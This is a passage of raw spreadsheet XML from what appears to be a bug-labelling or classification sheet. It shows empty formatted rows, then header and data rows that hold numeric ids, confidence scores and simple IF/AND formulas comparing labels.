      <c r="A911" s="56"/>
      <c r="B911" s="56"/>
      <c r="C911" s="56"/>
      <c r="D911" s="57"/>
      <c r="E911" s="57"/>
    </row>
    <row r="912">
      <c r="A912" s="56"/>
      <c r="B912" s="56"/>
      <c r="C912" s="56"/>
      <c r="D912" s="57"/>
      <c r="E912" s="57"/>
    </row>
    <row r="913">
      <c r="A913" s="56"/>
      <c r="B913" s="56"/>
      <c r="C913" s="56"/>
      <c r="D913" s="57"/>
      <c r="E913" s="57"/>
    </row>
    <row r="914">
      <c r="A914" s="56"/>
      <c r="B914" s="56"/>
      <c r="C914" s="56"/>
      <c r="D914" s="57"/>
      <c r="E914" s="57"/>
    </row>
    <row r="915">
      <c r="A915" s="56"/>
      <c r="B915" s="56"/>
      <c r="C915" s="56"/>
      <c r="D915" s="57"/>
      <c r="E915" s="57"/>
    </row>
    <row r="916">
      <c r="D916" s="58"/>
      <c r="E916" s="58"/>
    </row>
    <row r="917">
      <c r="D917" s="58"/>
      <c r="E917" s="58"/>
    </row>
    <row r="918">
      <c r="D918" s="58"/>
      <c r="E918" s="58"/>
    </row>
    <row r="919">
      <c r="D919" s="58"/>
      <c r="E919" s="58"/>
    </row>
    <row r="920">
      <c r="D920" s="58"/>
      <c r="E920" s="58"/>
    </row>
    <row r="921">
      <c r="D921" s="58"/>
      <c r="E921" s="58"/>
    </row>
    <row r="922">
      <c r="D922" s="58"/>
      <c r="E922" s="58"/>
    </row>
    <row r="923">
      <c r="D923" s="58"/>
      <c r="E923" s="58"/>
    </row>
    <row r="924">
      <c r="D924" s="58"/>
      <c r="E924" s="58"/>
    </row>
    <row r="925">
      <c r="D925" s="58"/>
      <c r="E925" s="58"/>
    </row>
    <row r="926">
      <c r="D926" s="58"/>
      <c r="E926" s="58"/>
    </row>
    <row r="927">
      <c r="D927" s="58"/>
      <c r="E927" s="58"/>
    </row>
    <row r="928">
      <c r="D928" s="58"/>
      <c r="E928" s="58"/>
    </row>
    <row r="929">
      <c r="D929" s="58"/>
      <c r="E929" s="58"/>
    </row>
    <row r="930">
      <c r="D930" s="58"/>
      <c r="E930" s="58"/>
    </row>
    <row r="931">
      <c r="D931" s="58"/>
      <c r="E931" s="58"/>
    </row>
    <row r="932">
      <c r="D932" s="58"/>
      <c r="E932" s="58"/>
    </row>
    <row r="933">
      <c r="D933" s="58"/>
      <c r="E933" s="58"/>
    </row>
    <row r="934">
      <c r="D934" s="58"/>
      <c r="E934" s="58"/>
    </row>
    <row r="935">
      <c r="D935" s="58"/>
      <c r="E935" s="58"/>
    </row>
    <row r="936">
      <c r="D936" s="58"/>
      <c r="E936" s="58"/>
    </row>
    <row r="937">
      <c r="D937" s="58"/>
      <c r="E937" s="58"/>
    </row>
    <row r="938">
      <c r="D938" s="58"/>
      <c r="E938" s="58"/>
    </row>
    <row r="939">
      <c r="D939" s="58"/>
      <c r="E939" s="58"/>
    </row>
    <row r="940">
      <c r="D940" s="58"/>
      <c r="E940" s="58"/>
    </row>
    <row r="941">
      <c r="D941" s="58"/>
      <c r="E941" s="58"/>
    </row>
    <row r="942">
      <c r="D942" s="58"/>
      <c r="E942" s="58"/>
    </row>
    <row r="943">
      <c r="D943" s="58"/>
      <c r="E943" s="58"/>
    </row>
    <row r="944">
      <c r="D944" s="58"/>
      <c r="E944" s="58"/>
    </row>
    <row r="945">
      <c r="D945" s="58"/>
      <c r="E945" s="58"/>
    </row>
    <row r="946">
      <c r="D946" s="58"/>
      <c r="E946" s="58"/>
    </row>
    <row r="947">
      <c r="D947" s="58"/>
      <c r="E947" s="58"/>
    </row>
    <row r="948">
      <c r="D948" s="58"/>
      <c r="E948" s="58"/>
    </row>
    <row r="949">
      <c r="D949" s="58"/>
      <c r="E949" s="58"/>
    </row>
    <row r="950">
      <c r="D950" s="58"/>
      <c r="E950" s="58"/>
    </row>
    <row r="951">
      <c r="D951" s="58"/>
      <c r="E951" s="58"/>
    </row>
    <row r="952">
      <c r="D952" s="58"/>
      <c r="E952" s="58"/>
    </row>
    <row r="953">
      <c r="D953" s="58"/>
      <c r="E953" s="58"/>
    </row>
    <row r="954">
      <c r="D954" s="58"/>
      <c r="E954" s="58"/>
    </row>
    <row r="955">
      <c r="D955" s="58"/>
      <c r="E955" s="58"/>
    </row>
    <row r="956">
      <c r="D956" s="58"/>
      <c r="E956" s="58"/>
    </row>
    <row r="957">
      <c r="D957" s="58"/>
      <c r="E957" s="58"/>
    </row>
    <row r="958">
      <c r="D958" s="58"/>
      <c r="E958" s="58"/>
    </row>
    <row r="959">
      <c r="D959" s="58"/>
      <c r="E959" s="58"/>
    </row>
    <row r="960">
      <c r="D960" s="58"/>
      <c r="E960" s="58"/>
    </row>
    <row r="961">
      <c r="D961" s="58"/>
      <c r="E961" s="58"/>
    </row>
    <row r="962">
      <c r="D962" s="58"/>
      <c r="E962" s="58"/>
    </row>
    <row r="963">
      <c r="D963" s="58"/>
      <c r="E963" s="58"/>
    </row>
    <row r="964">
      <c r="D964" s="58"/>
      <c r="E964" s="58"/>
    </row>
    <row r="965">
      <c r="D965" s="58"/>
      <c r="E965" s="58"/>
    </row>
    <row r="966">
      <c r="D966" s="58"/>
      <c r="E966" s="58"/>
    </row>
    <row r="967">
      <c r="D967" s="58"/>
      <c r="E967" s="58"/>
    </row>
    <row r="968">
      <c r="D968" s="58"/>
      <c r="E968" s="58"/>
    </row>
    <row r="969">
      <c r="D969" s="58"/>
      <c r="E969" s="58"/>
    </row>
    <row r="970">
      <c r="D970" s="58"/>
      <c r="E970" s="58"/>
    </row>
    <row r="971">
      <c r="D971" s="58"/>
      <c r="E971" s="58"/>
    </row>
    <row r="972">
      <c r="D972" s="58"/>
      <c r="E972" s="58"/>
    </row>
    <row r="973">
      <c r="D973" s="58"/>
      <c r="E973" s="58"/>
    </row>
    <row r="974">
      <c r="D974" s="58"/>
      <c r="E974" s="58"/>
    </row>
    <row r="975">
      <c r="D975" s="58"/>
      <c r="E975" s="58"/>
    </row>
    <row r="976">
      <c r="D976" s="58"/>
      <c r="E976" s="58"/>
    </row>
    <row r="977">
      <c r="D977" s="58"/>
      <c r="E977" s="58"/>
    </row>
    <row r="978">
      <c r="D978" s="58"/>
      <c r="E978" s="58"/>
    </row>
    <row r="979">
      <c r="D979" s="58"/>
      <c r="E979" s="58"/>
    </row>
    <row r="980">
      <c r="D980" s="58"/>
      <c r="E980" s="58"/>
    </row>
    <row r="981">
      <c r="D981" s="58"/>
      <c r="E981" s="58"/>
    </row>
    <row r="982">
      <c r="D982" s="58"/>
      <c r="E982" s="58"/>
    </row>
    <row r="983">
      <c r="D983" s="58"/>
      <c r="E983" s="58"/>
    </row>
    <row r="984">
      <c r="D984" s="58"/>
      <c r="E984" s="58"/>
    </row>
    <row r="985">
      <c r="D985" s="58"/>
      <c r="E985" s="58"/>
    </row>
    <row r="986">
      <c r="D986" s="58"/>
      <c r="E986" s="58"/>
    </row>
    <row r="987">
      <c r="D987" s="58"/>
      <c r="E987" s="58"/>
    </row>
    <row r="988">
      <c r="D988" s="58"/>
      <c r="E988" s="58"/>
    </row>
    <row r="989">
      <c r="D989" s="58"/>
      <c r="E989" s="58"/>
    </row>
    <row r="990">
      <c r="D990" s="58"/>
      <c r="E990" s="58"/>
    </row>
    <row r="991">
      <c r="D991" s="58"/>
      <c r="E991" s="58"/>
    </row>
    <row r="992">
      <c r="D992" s="58"/>
      <c r="E992" s="58"/>
    </row>
    <row r="993">
      <c r="D993" s="58"/>
      <c r="E993" s="58"/>
    </row>
    <row r="994">
      <c r="D994" s="58"/>
      <c r="E994" s="58"/>
    </row>
    <row r="995">
      <c r="D995" s="58"/>
      <c r="E995" s="58"/>
    </row>
    <row r="996">
      <c r="D996" s="58"/>
      <c r="E996" s="58"/>
    </row>
    <row r="997">
      <c r="D997" s="58"/>
      <c r="E997" s="58"/>
    </row>
    <row r="998">
      <c r="D998" s="58"/>
      <c r="E998" s="58"/>
    </row>
    <row r="999">
      <c r="D999" s="58"/>
      <c r="E999" s="58"/>
    </row>
    <row r="1000">
      <c r="D1000" s="58"/>
      <c r="E1000" s="5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s>
  <drawing r:id="rId5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9.13"/>
    <col customWidth="1" min="4" max="4" width="63.0"/>
    <col customWidth="1" min="5" max="5" width="30.13"/>
    <col customWidth="1" min="6" max="6" width="6.0"/>
    <col customWidth="1" min="8" max="8" width="14.5"/>
    <col customWidth="1" min="9" max="9" width="12.63"/>
    <col customWidth="1" min="14" max="14" width="16.75"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="59" t="s">
        <v>116</v>
      </c>
      <c r="B1" s="59" t="s">
        <v>117</v>
      </c>
      <c r="C1" s="59" t="s">
        <v>118</v>
      </c>
      <c r="D1" s="59" t="s">
        <v>119</v>
      </c>
      <c r="E1" s="59" t="s">
        <v>120</v>
      </c>
      <c r="F1" s="59" t="s">
        <v>121</v>
      </c>
      <c r="G1" s="59" t="s">
        <v>122</v>
      </c>
      <c r="H1" s="60" t="s">
        <v>123</v>
      </c>
      <c r="I1" s="60" t="s">
        <v>124</v>
      </c>
      <c r="J1" s="59" t="s">
        <v>125</v>
      </c>
      <c r="K1" s="59" t="s">
        <v>126</v>
      </c>
      <c r="L1" s="59" t="s">
        <v>127</v>
      </c>
      <c r="M1" s="59" t="s">
        <v>128</v>
      </c>
      <c r="N1" s="59" t="s">
        <v>129</v>
      </c>
      <c r="O1" s="59" t="s">
        <v>130</v>
      </c>
      <c r="P1" s="61"/>
      <c r="Q1" s="61"/>
      <c r="R1" s="61"/>
      <c r="S1" s="61"/>
      <c r="T1" s="61"/>
      <c r="U1" s="61"/>
    </row>
    <row r="2">
      <c r="A2" s="62">
        <v>27.0</v>
      </c>
      <c r="B2" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="63" t="s">
        <v>131</v>
      </c>
      <c r="D2" s="62" t="s">
        <v>132</v>
      </c>
      <c r="E2" s="62" t="s">
        <v>133</v>
      </c>
      <c r="F2" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G2" s="62">
        <v>0.85</v>
      </c>
      <c r="H2" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I2" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J2" s="65">
        <f t="shared" ref="J2:J909" si="1">if(H2=1,1,0)</f>
        <v>0</v>
      </c>
      <c r="K2" s="65">
        <f t="shared" ref="K2:K909" si="2">if(I2="bug",1,0)</f>
        <v>1</v>
      </c>
      <c r="L2" s="65">
        <f t="shared" ref="L2:L909" si="3">if(And(J2=1, J2=K2),1,0)</f>
        <v>0</v>
      </c>
      <c r="O2" s="62">
        <v>0.0</v>
      </c>
      <c r="Q2" s="62" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="62">
        <v>187.0</v>
      </c>
      <c r="B3" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C3" s="63" t="s">
        <v>137</v>
      </c>
      <c r="D3" s="62" t="s">
        <v>138</v>
      </c>
      <c r="E3" s="62" t="s">
        <v>139</v>
      </c>
      <c r="F3" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G3" s="62">
        <v>0.8</v>
      </c>
      <c r="H3" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I3" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J3" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K3" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L3" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O3" s="62">
        <v>0.0</v>
      </c>
      <c r="R3" s="62" t="s">
        <v>140</v>
      </c>
      <c r="S3" s="62" t="s">
        <v>141</v>
      </c>
      <c r="T3" s="62" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="62">
        <v>208.0</v>
      </c>
      <c r="B4" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="63" t="s">
        <v>143</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>144</v>
      </c>
      <c r="E4" s="62" t="s">
        <v>145</v>
      </c>
      <c r="F4" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G4" s="62">
        <v>0.9</v>
      </c>
      <c r="H4" s="64">
        <v>1.0</v>
      </c>
      <c r="I4" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J4" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K4" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L4" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O4" s="62">
        <v>1.0</v>
      </c>
      <c r="Q4" s="62" t="s">
        <v>146</v>
      </c>
      <c r="R4" s="62">
        <v>607.0</v>
      </c>
      <c r="S4" s="62">
        <v>5.0</v>
      </c>
      <c r="T4" s="62">
        <v>612.0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="62">
        <v>389.0</v>
      </c>
      <c r="B5" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C5" s="63" t="s">
        <v>147</v>
      </c>
      <c r="D5" s="62" t="s">
        <v>148</v>
      </c>
      <c r="E5" s="62" t="s">
        <v>149</v>
      </c>
      <c r="F5" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G5" s="62">
        <v>0.9</v>
      </c>
      <c r="H5" s="64">
        <v>1.0</v>
      </c>
      <c r="I5" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J5" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K5" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L5" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O5" s="62">
        <v>1.0</v>
      </c>
      <c r="Q5" s="62" t="s">
        <v>150</v>
      </c>
      <c r="R5" s="62">
        <v>49.0</v>
      </c>
      <c r="S5" s="62">
        <v>247.0</v>
      </c>
      <c r="T5" s="62">
        <v>296.0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="62">
        <v>459.0</v>
      </c>
      <c r="B6" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C6" s="63" t="s">
        <v>151</v>
      </c>
      <c r="D6" s="62" t="s">
        <v>152</v>
      </c>
      <c r="E6" s="62" t="s">
        <v>153</v>
      </c>
      <c r="F6" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G6" s="62">
        <v>0.9</v>
      </c>
      <c r="H6" s="64">
        <v>1.0</v>
      </c>
      <c r="I6" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J6" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K6" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L6" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O6" s="62">
        <v>1.0</v>
      </c>
      <c r="Q6" s="62" t="s">
        <v>154</v>
      </c>
      <c r="R6" s="62">
        <v>656.0</v>
      </c>
      <c r="S6" s="62">
        <v>252.0</v>
      </c>
      <c r="T6" s="62">
        <v>908.0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="62">
        <v>470.0</v>
      </c>
      <c r="B7" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C7" s="63" t="s">
        <v>155</v>
      </c>
      <c r="D7" s="62" t="s">
        <v>156</v>
      </c>
      <c r="E7" s="62" t="s">
        <v>157</v>
      </c>
      <c r="F7" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G7" s="62">
        <v>0.9</v>
      </c>
      <c r="H7" s="64">
        <v>0.0</v>
      </c>
      <c r="I7" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J7" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K7" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L7" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O7" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="62">
        <v>556.0</v>
      </c>
      <c r="B8" s="62" t="s">
        <v>5</v>
      </c>
      <c r="C8" s="63" t="s">
        <v>159</v>
      </c>
      <c r="D8" s="62" t="s">
        <v>160</v>
      </c>
      <c r="E8" s="62" t="s">
        <v>161</v>
      </c>
      <c r="F8" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G8" s="62">
        <v>0.85</v>
      </c>
      <c r="H8" s="64">
        <v>0.0</v>
      </c>
      <c r="I8" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J8" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K8" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L8" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O8" s="62">
        <v>1.0</v>
      </c>
      <c r="Q8" s="62" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="62">
        <v>17.0</v>
      </c>
      <c r="B9" s="62" t="s">
        <v>8</v>
      </c>
      <c r="C9" s="63" t="s">
        <v>163</v>
      </c>
      <c r="D9" s="62" t="s">
        <v>164</v>
      </c>
      <c r="E9" s="62" t="s">
        <v>165</v>
      </c>
      <c r="F9" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G9" s="62">
        <v>0.8</v>
      </c>
      <c r="H9" s="64">
        <v>1.0</v>
      </c>
      <c r="I9" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J9" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K9" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L9" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O9" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="62">
        <v>94.0</v>
      </c>
      <c r="B10" s="62" t="s">
        <v>8</v>
      </c>
      <c r="C10" s="63" t="s">
        <v>166</v>
      </c>
      <c r="D10" s="62" t="s">
        <v>167</v>
      </c>
      <c r="E10" s="62" t="s">
        <v>168</v>
      </c>
      <c r="F10" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G10" s="62">
        <v>0.8</v>
      </c>
      <c r="H10" s="64">
        <v>1.0</v>
      </c>
      <c r="I10" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J10" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K10" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L10" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O10" s="62">
        <v>1.0</v>
      </c>
      <c r="Q10" s="62" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="62">
        <v>120.0</v>
      </c>
      <c r="B11" s="62" t="s">
        <v>8</v>
      </c>
      <c r="C11" s="63" t="s">
        <v>170</v>
      </c>
      <c r="D11" s="62" t="s">
        <v>171</v>
      </c>
      <c r="E11" s="62" t="s">
        <v>172</v>
      </c>
      <c r="F11" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G11" s="62">
        <v>0.9</v>
      </c>
      <c r="H11" s="64">
        <v>1.0</v>
      </c>
      <c r="I11" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J11" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K11" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L11" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O11" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="62">
        <v>4492.0</v>
      </c>
      <c r="B12" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C12" s="63" t="s">
        <v>173</v>
      </c>
      <c r="D12" s="62" t="s">
        <v>174</v>
      </c>
      <c r="E12" s="62" t="s">
        <v>175</v>
      </c>
      <c r="F12" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G12" s="62">
        <v>0.9</v>
      </c>
      <c r="H12" s="64">
        <v>1.0</v>
      </c>
      <c r="I12" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J12" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K12" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L12" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O12" s="62">
        <v>1.0</v>
      </c>
      <c r="Q12" s="62" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="62">
        <v>4531.0</v>
      </c>
      <c r="B13" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C13" s="63" t="s">
        <v>177</v>
      </c>
      <c r="D13" s="62" t="s">
        <v>178</v>
      </c>
      <c r="E13" s="62" t="s">
        <v>179</v>
      </c>
      <c r="F13" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G13" s="62">
        <v>0.9</v>
      </c>
      <c r="H13" s="64">
        <v>1.0</v>
      </c>
      <c r="I13" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J13" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K13" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L13" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O13" s="62">
        <v>1.0</v>
      </c>
      <c r="Q13" s="62" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="62">
        <v>4541.0</v>
      </c>
      <c r="B14" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="63" t="s">
        <v>181</v>
      </c>
      <c r="D14" s="62" t="s">
        <v>182</v>
      </c>
      <c r="E14" s="62" t="s">
        <v>183</v>
      </c>
      <c r="F14" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G14" s="62">
        <v>0.9</v>
      </c>
      <c r="H14" s="64">
        <v>1.0</v>
      </c>
      <c r="I14" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J14" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K14" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L14" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O14" s="62">
        <v>1.0</v>
      </c>
      <c r="Q14" s="62" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="62">
        <v>4542.0</v>
      </c>
      <c r="B15" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C15" s="63" t="s">
        <v>185</v>
      </c>
      <c r="D15" s="62" t="s">
        <v>186</v>
      </c>
      <c r="E15" s="62" t="s">
        <v>187</v>
      </c>
      <c r="F15" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G15" s="62">
        <v>0.9</v>
      </c>
      <c r="H15" s="64">
        <v>0.0</v>
      </c>
      <c r="I15" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J15" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K15" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L15" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O15" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="62">
        <v>4573.0</v>
      </c>
      <c r="B16" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C16" s="63" t="s">
        <v>188</v>
      </c>
      <c r="D16" s="62" t="s">
        <v>189</v>
      </c>
      <c r="E16" s="62" t="s">
        <v>190</v>
      </c>
      <c r="F16" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G16" s="62">
        <v>0.9</v>
      </c>
      <c r="H16" s="64">
        <v>1.0</v>
      </c>
      <c r="I16" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J16" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K16" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L16" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O16" s="62">
        <v>1.0</v>
      </c>
      <c r="Q16" s="62" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="62">
        <v>4781.0</v>
      </c>
      <c r="B17" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C17" s="63" t="s">
        <v>192</v>
      </c>
      <c r="D17" s="62" t="s">
        <v>193</v>
      </c>
      <c r="E17" s="62" t="s">
        <v>194</v>
      </c>
      <c r="F17" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G17" s="62">
        <v>0.9</v>
      </c>
      <c r="H17" s="64">
        <v>1.0</v>
      </c>
      <c r="I17" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J17" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K17" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L17" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O17" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="62">
        <v>4907.0</v>
      </c>
      <c r="B18" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C18" s="63" t="s">
        <v>195</v>
      </c>
      <c r="D18" s="62" t="s">
        <v>196</v>
      </c>
      <c r="E18" s="62" t="s">
        <v>197</v>
      </c>
      <c r="F18" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G18" s="62">
        <v>0.9</v>
      </c>
      <c r="H18" s="64">
        <v>1.0</v>
      </c>
      <c r="I18" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J18" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K18" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L18" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M18" s="62" t="s">
        <v>198</v>
      </c>
      <c r="N18" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O18" s="62">
        <v>1.0</v>
      </c>
      <c r="Q18" s="62" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="62">
        <v>4910.0</v>
      </c>
      <c r="B19" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C19" s="63" t="s">
        <v>201</v>
      </c>
      <c r="D19" s="62" t="s">
        <v>202</v>
      </c>
      <c r="E19" s="62" t="s">
        <v>203</v>
      </c>
      <c r="F19" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G19" s="62">
        <v>0.9</v>
      </c>
      <c r="H19" s="64">
        <v>1.0</v>
      </c>
      <c r="I19" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J19" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K19" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L19" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O19" s="62">
        <v>1.0</v>
      </c>
      <c r="Q19" s="62" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="62">
        <v>4943.0</v>
      </c>
      <c r="B20" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C20" s="63" t="s">
        <v>205</v>
      </c>
      <c r="D20" s="62" t="s">
        <v>206</v>
      </c>
      <c r="E20" s="62" t="s">
        <v>207</v>
      </c>
      <c r="F20" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G20" s="62">
        <v>0.85</v>
      </c>
      <c r="H20" s="64">
        <v>1.0</v>
      </c>
      <c r="I20" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J20" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K20" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L20" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O20" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="62">
        <v>5028.0</v>
      </c>
      <c r="B21" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C21" s="63" t="s">
        <v>208</v>
      </c>
      <c r="D21" s="62" t="s">
        <v>209</v>
      </c>
      <c r="E21" s="62" t="s">
        <v>210</v>
      </c>
      <c r="F21" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G21" s="62">
        <v>0.9</v>
      </c>
      <c r="H21" s="64">
        <v>1.0</v>
      </c>
      <c r="I21" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J21" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K21" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L21" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O21" s="62">
        <v>1.0</v>
      </c>
      <c r="Q21" s="62" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="62">
        <v>5046.0</v>
      </c>
      <c r="B22" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C22" s="63" t="s">
        <v>212</v>
      </c>
      <c r="D22" s="62" t="s">
        <v>213</v>
      </c>
      <c r="E22" s="62" t="s">
        <v>214</v>
      </c>
      <c r="F22" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G22" s="62">
        <v>0.9</v>
      </c>
      <c r="H22" s="64">
        <v>1.0</v>
      </c>
      <c r="I22" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J22" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K22" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L22" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
